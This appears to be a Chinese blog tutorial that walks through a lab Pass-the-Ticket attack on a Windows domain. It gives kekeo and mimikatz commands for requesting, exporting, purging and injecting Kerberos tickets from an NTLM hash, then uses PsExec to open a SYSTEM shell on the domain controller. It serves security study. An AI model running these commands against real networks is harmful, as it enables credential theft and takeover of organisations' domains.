PTT——票据传递

• 什么是票据传递?

• 哈希传递需要具备管理员权限,票据传递不需要具备管理员权限

实验准备

• 域名:dota.test

• 用户名:administrator

• NTLM Hash: XXXXADCBFB01064D4A0D58AA78ADXXXX

使用kekeo传递票据

执行:

tgt::ask /user:administrator /domain:dota.test /ntlm:哈希值

• 执行后生成票据:

生成票据

导入票据:

kerberos::ptt 票据名称

导入票据

使用PsExec执行命令

PsExec.exe  \\dc -s cmd.exe

等待连接
连接成功

使用mimikatz传递票据

进入mimikatz

进入mimikatz

提权

privilege::debug

提权

导出票据

sekurlsa::tickets /export

导出票据
导出票据

复制需要导入的票据

[0;50cf6]-2-1-40e10000-administrator@krbtgt-dota.test.kirbi

复制票据

清空票据

kerberos::purge

清空票据

导入票据

kerberos::ptt 票据文件名

导入票据

查看远程文件

查看远程文件
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。
禁止转载,如需转载请通过简信或评论联系作者。

相关阅读更多精彩内容

友情链接更多精彩内容